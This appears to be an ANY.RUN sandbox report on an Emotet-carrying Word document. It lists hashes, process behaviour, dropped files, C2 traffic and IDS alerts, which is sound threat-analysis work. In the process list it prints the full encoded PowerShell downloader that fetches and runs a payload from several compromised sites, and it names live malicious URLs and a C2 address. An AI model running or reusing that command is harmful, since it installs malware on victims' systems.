analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

FCB6565 2020_09_30 0109452.doc

Full analysis: https://app.any.run/tasks/933d8c56-bb0b-4959-9a9e-4065d0b0564a
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: September 30, 2020, 06:34:48
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
emotet-doc
emotet
generated-doc
trojan
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Quia., Author: Nomie Lemaire, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Sep 29 23:29:00 2020, Last Saved Time/Date: Tue Sep 29 23:29:00 2020, Number of Pages: 1, Number of Words: 3749, Number of Characters: 21371, Security: 8
MD5:

846CB9A4765B7828EC5305CBF886BE56

SHA1:

73C81EA5055A15DA82A4C9FE604EC1F2518CA608

SHA256:

225028085101FDAA162121AAAB2ADF12B5D5C8032DCDE4A511B1C662634E0B84

SSDEEP:

1536:hMRD3bNqfNpu39IId5a6XP3Mg8af2qc9ieW0jnzj:CR1qf69xak3Mgx2vVjnzj

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • NlsLexicons0011.exe (PID: 1752)
      • T36vmr9l.exe (PID: 3792)
    • Changes the autorun value in the registry

      • NlsLexicons0011.exe (PID: 1752)
    • EMOTET was detected

      • NlsLexicons0011.exe (PID: 1752)
    • Connects to CnC server

      • NlsLexicons0011.exe (PID: 1752)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • POwersheLL.exe (PID: 2132)
      • T36vmr9l.exe (PID: 3792)
    • PowerShell script executed

      • POwersheLL.exe (PID: 2132)
    • Reads Internet Cache Settings

      • NlsLexicons0011.exe (PID: 1752)
    • Starts itself from another location

      • T36vmr9l.exe (PID: 3792)
    • Executed via WMI

      • POwersheLL.exe (PID: 2132)
    • Creates files in the user directory

      • POwersheLL.exe (PID: 2132)
  • INFO

    • Reads settings of System Certificates

      • POwersheLL.exe (PID: 2132)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2620)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2620)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: Quia.
Subject: -
Author: Noémie Lemaire
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2020:09:29 22:29:00
ModifyDate: 2020:09:29 22:29:00
Pages: 1
Words: 3749
Characters: 21371
Security: Locked for annotations
Company: -
Lines: 178
Paragraphs: 50
CharCountWithSpaces: 25070
AppVersion: 15
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CodePage: Unicode UTF-16, little endian
LocaleIndicator: 1033
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
4
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe t36vmr9l.exe #EMOTET nlslexicons0011.exe

Process information

PID
CMD
Path
Indicators
Parent process
2620"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\FCB6565 2020_09_30 0109452.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2132POwersheLL -ENCOD JABJAGIAYQB0AGQAbwBtAD0AKAAnAE0AYwAnACsAKAAnAHoAJwArACcAbgBpACcAKQArACcAcgA1ACcAKQA7AC4AKAAnAG4AZQAnACsAJwB3AC0AaQB0ACcAKwAnAGUAbQAnACkAIAAkAGUATgB2ADoAdQBTAGUAUgBwAFIATwBGAGkATABFAFwAUwBzAEgATgBhAE0ASQBcAFUANwBfAEIAVQB5AGEAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABpAFIAZQBDAFQATwByAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAZQBDAFUAYABSAEkAVABZAHAAYABSAG8AYABUAGAATwBjAE8ATAAiACAAPQAgACgAKAAnAHQAJwArACcAbABzADEAMgAnACkAKwAoACcALAAgACcAKwAnAHQAbAAnACkAKwAoACcAcwAxADEAJwArACcALAAgACcAKQArACcAdAAnACsAJwBsAHMAJwApADsAJABJAGEAegB1ADcANgBiACAAPQAgACgAKAAnAFQAJwArACcAMwA2AHYAJwApACsAKAAnAG0AJwArACcAcgA5ACcAKQArACcAbAAnACkAOwAkAFAAbAA0ADQAZwBzAHkAPQAoACgAJwBFACcAKwAnAGkANgAnACkAKwAoACcANQAnACsAJwB0AG0AJwApACsAJwBtACcAKQA7ACQAUQA3AHMAYwB6ADQAaQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAJwBjAEoAJwArACgAJwB1ACcAKwAnAFMAcwBoAG4AYQBtACcAKQArACcAaQBjACcAKwAoACcASgB1AFUANwAnACsAJwBfAGIAJwArACcAdQB5AGEAJwApACsAKAAnAGMASgAnACsAJwB1ACcAKQApACAALQBDAFIARQBwAGwAYQBDAEUAIAAgACgAWwBjAGgAQQByAF0AOQA5ACsAWwBjAGgAQQByAF0ANwA0ACsAWwBjAGgAQQByAF0AMQAxADcAKQAsAFsAYwBoAEEAcgBdADkAMgApACsAJABJAGEAegB1ADcANgBiACsAKAAoACcALgBlACcAKwAnAHgAJwApACsAJwBlACcAKQA7ACQASgA3ADkAeAA2AHkAbAA9ACgAKAAnAE0AawA0ACcAKwAnADUAcQAnACsAJwBoACcAKQArACcANgAnACkAOwAkAEIAZwBhAHkAbwB2AHIAPQAuACgAJwBuAGUAdwAtAG8AYgAnACsAJwBqACcAKwAnAGUAYwB0ACcAKQAgAG4ARQBUAC4AVwBFAGIAQwBsAGkARQBOAHQAOwAkAFEAMQBlAGEAbgA5AGIAPQAoACgAJwBoACcAKwAnAHQAdABwACcAKQArACcAOgAnACsAJwAvAC8AJwArACgAJwB3AHcAdwAnACsAJwAuAHAAJwArACcAcgBvAGQAJwArACcAdQBjAHQAcwBvACcAKwAnAGYAaQBuACcAKQArACgAJwBkAGkAYQAnACsAJwByAGUAJwApACsAJwB2ACcAKwAnAGkAJwArACcAZQAnACsAKAAnAHcAcwAuACcAKwAnAGMAbwAnACkAKwAoACcAbQAnACsAJwAvAGMAJwApACsAJwBzAHMAJwArACgAJwAvACcAKwAnADkAVQB0ACcAKQArACcALwAqACcAKwAoACcAaAB0ACcAKwAnAHQAcABzADoAJwApACsAKAAnAC8ALwBvACcAKwAnAG4AbABpACcAKQArACgAJwBuACcAKwAnAGUAMgAnACkAKwAoACcANABoAC4AYgAnACsAJwBpACcAKQArACgAJwB6ACcAKwAnAC8AdwBwAC0AJwApACsAKAAnAGEAZAAnACsAJwBtACcAKQArACgAJwBpACcAKwAnAG4ALwBuAC8AJwArACcAKgAnACsAJwBoAHQAdAAnACkAKwAnAHAAJwArACgAJwBzACcAKwAnADoALwAvACcAKQArACcAcwAnACsAJwB0ACcAKwAoACcAYQByAC0AJwArACcAcwBwACcAKwAnAGUAJwApACsAKAAnAGUAZAAuACcAKwAnAHYAaQBwACcAKQArACgAJwAvAHcAcAAtAGEAZAAnACsAJwBtACcAKQArACcAaQBuACcAKwAoACcALwBqACcAKwAnAHAAJwApACsAJwAvACoAJwArACcAaAB0ACcAKwAoACcAdAAnACsAJwBwAHMAOgAvAC8AawAnACsAJwBlACcAKQArACgAJwBuACcAKwAnAGgAdABoAGkAZQAnACsAJwB0AGsAZQAnACkAKwAnAC4AJwArACgAJwBjAG8AbQAvADAAJwArACcARgBnAC8AJwApACsAJwAqAGgAJwArACgAJwB0AHQAJwArACcAcABzADoAJwApACsAJwAvAC8AJwArACcAcwAnACsAKAAnAHkAbgAnACsAJwB0ACcAKQArACgAJwBlAGcAJwArACcAbwAnACkAKwAnAHcAJwArACgAJwBzAC4AYwBvACcAKwAnAG0ALwBjAGgAJwApACsAJwBpAHIAJwArACgAJwBhAGcAJwArACcALwAnACkAKwAnAEsAJwArACcAWAAvACcAKwAnACoAJwArACgAJwBoAHQAJwArACcAdABwACcAKwAnAHMAOgAvAC8AJwApACsAKAAnAHYAJwArACcAaQBzACcAKwAnAGgAYQBsAHAAJwApACsAKAAnAGEAdABvAGwAYQAnACsAJwAuAGMAbwBtACcAKwAnAC8AJwApACsAKAAnAHcAJwArACcAcAAtAGEAZABtAGkAJwArACcAbgAvADIALwAnACkAKwAoACcAKgBoAHQAdABwAHMAJwArACcAOgAnACsAJwAvAC8AJwApACsAJwBzAGgAJwArACgAJwBtACcAKwAnAGMAdAAuAG8AJwArACcAcgBnACcAKQArACcALwAnACsAJwB3ACcAKwAoACcAcAAtAGEAJwArACcAZAAnACkAKwAoACcAbQAnACsAJwBpAG4ALwAnACkAKwAoACcAWAAnACsAJwBtAC8AJwApACkALgAiAFMAcABgAEwASQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAUwA3AHMAZAB0AGEAbAA9ACgAKAAnAEEAJwArACcAbwBjAGkAXwAnACsAJwB6ACcAKQArACcAaQAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABKADUAaAB2AGQAdAA2ACAAaQBuACAAJABRADEAZQBhAG4AOQBiACkAewB0AHIAeQB7ACQAQgBnAGEAeQBvAHYAcgAuACIARABvAHcAYABOAGwAbwBgAEEAZABmAGkAYABsAGUAIgAoACQASgA1AGgAdgBkAHQANgAsACAAJABRADcAcwBjAHoANABpACkAOwAkAE4AcAAwAHYAXwB5ADQAPQAoACgAJwBaADIAJwArACcAbQAnACkAKwAnADgAMQAnACsAJwA2AHQAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAJwArACcAbQAnACkAIAAkAFEANwBzAGMAegA0AGkAKQAuACIATABFAE4ARwBgAFQAaAAiACAALQBnAGUAIAAzADkAMgAyADMAKQAgAHsAJgAoACcASQAnACsAJwBuACcAKwAnAHYAbwBrAGUAJwArACcALQBJAHQAZQBtACcAKQAoACQAUQA3AHMAYwB6ADQAaQApADsAJABUAGUAeAA2AGoAeABuAD0AKAAnAEoAdwAnACsAKAAnAHIAdwBkACcAKwAnAGMANAAnACkAKQA7AGIAcgBlAGEAawA7ACQASgBrAGIAagBqAGQAYgA9ACgAKAAnAE8AJwArACcAZAAzACcAKQArACcAegBvACcAKwAnADYAaAAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEMANQBqAHYAdgB1AGsAPQAoACcAUAAnACsAKAAnAF8AdwAnACsAJwBjACcAKQArACgAJwBtAG0AJwArACcAOAAnACkAKQA= C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3792"C:\Users\admin\Sshnami\U7_buya\T36vmr9l.exe" C:\Users\admin\Sshnami\U7_buya\T36vmr9l.exe
POwersheLL.exe
User:
admin
Company:
Flex Inc.
Integrity Level:
MEDIUM
Description:
Replacement for the Masked Edit Control v 2.0.
Exit code:
0
Version:
2.8.0.3
1752"C:\Users\admin\AppData\Local\api-ms-win-crt-heap-l1-1-0\NlsLexicons0011.exe"C:\Users\admin\AppData\Local\api-ms-win-crt-heap-l1-1-0\NlsLexicons0011.exe
T36vmr9l.exe
User:
admin
Company:
Flex Inc.
Integrity Level:
MEDIUM
Description:
Replacement for the Masked Edit Control v 2.0.
Version:
2.8.0.3
Total events
2 374
Read events
1 470
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
3

Dropped files

PID
Process
Filename
Type
2620WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA643.tmp.cvr
MD5:
SHA256:
2132POwersheLL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\28KKEKTUREL4QA5KTNDF.temp
MD5:
SHA256:
3792T36vmr9l.exeC:\Users\admin\AppData\Local\Temp\~DFA2B532252058B6DC.TMP
MD5:
SHA256:
2620WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:00B92B16F79EF6DD303E90865E112185
SHA256:C418AC081B79908D2C573C29DF720BA6D8D50238760DEAB60DC57824201F6CC0
2132POwersheLL.exeC:\Users\admin\Sshnami\U7_buya\T36vmr9l.exeexecutable
MD5:667A8C5EB0618C420A04F392EDFF0C69
SHA256:5D9285010466E2B3DFB842F5C16E300B2F823DFB6541960E4E8B0FF0DEEEEE6C
2132POwersheLL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:4028388263805ABA00088A0BA4EEA515
SHA256:5A67495439D515C063CD1732C649C5ADA72E7C0056CA8B6CD70A49F80643B948
3792T36vmr9l.exeC:\Users\admin\AppData\Local\api-ms-win-crt-heap-l1-1-0\NlsLexicons0011.exeexecutable
MD5:667A8C5EB0618C420A04F392EDFF0C69
SHA256:5D9285010466E2B3DFB842F5C16E300B2F823DFB6541960E4E8B0FF0DEEEEE6C
2620WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:1CAB91A261C312C6F2A8B168E732BE21
SHA256:860D3D9324264F25F0E7D9DE698940FFE45C54E9EAF12EFE5B3D3329DA4199EB
2132POwersheLL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF3bb16e.TMPbinary
MD5:4028388263805ABA00088A0BA4EEA515
SHA256:5A67495439D515C063CD1732C649C5ADA72E7C0056CA8B6CD70A49F80643B948
2620WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$B6565 2020_09_30 0109452.docpgc
MD5:FD97CE486BE9FAF539A903C998D9F1AD
SHA256:DB4107BB564B3E8244B8E87EB135B0405B5420739B218E9DB59759E872B1665A
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
3
DNS requests
4
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1752
NlsLexicons0011.exe
POST
200
202.22.141.45:80
http://202.22.141.45/mopFnhB4WXBbdpQ/O74fGmFuMdxMv4eOD/JZE45O5E5gVFxb/mulKwB/DsMLel1kc1iBg/WwfvhAYl/
NC
binary
132 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
202.22.141.45:80
OFFRATEL
NC
malicious
2132
POwersheLL.exe
68.66.228.11:80
www.productsofindiareviews.com
A2 Hosting, Inc.
US
suspicious
2132
POwersheLL.exe
34.69.189.17:443
online24h.biz
US
unknown

DNS requests

Domain
IP
Reputation
www.productsofindiareviews.com
  • 68.66.228.11
suspicious
dns.msftncsi.com
  • 131.107.255.255
shared
online24h.biz
  • 34.69.189.17
unknown

Threats

PID
Process
Class
Message
Potentially Bad Traffic
ET INFO Observed DNS Query to .biz TLD
1752
NlsLexicons0011.exe
A Network Trojan was detected
ET TROJAN Win32/Emotet CnC Activity (POST) M10
No debug info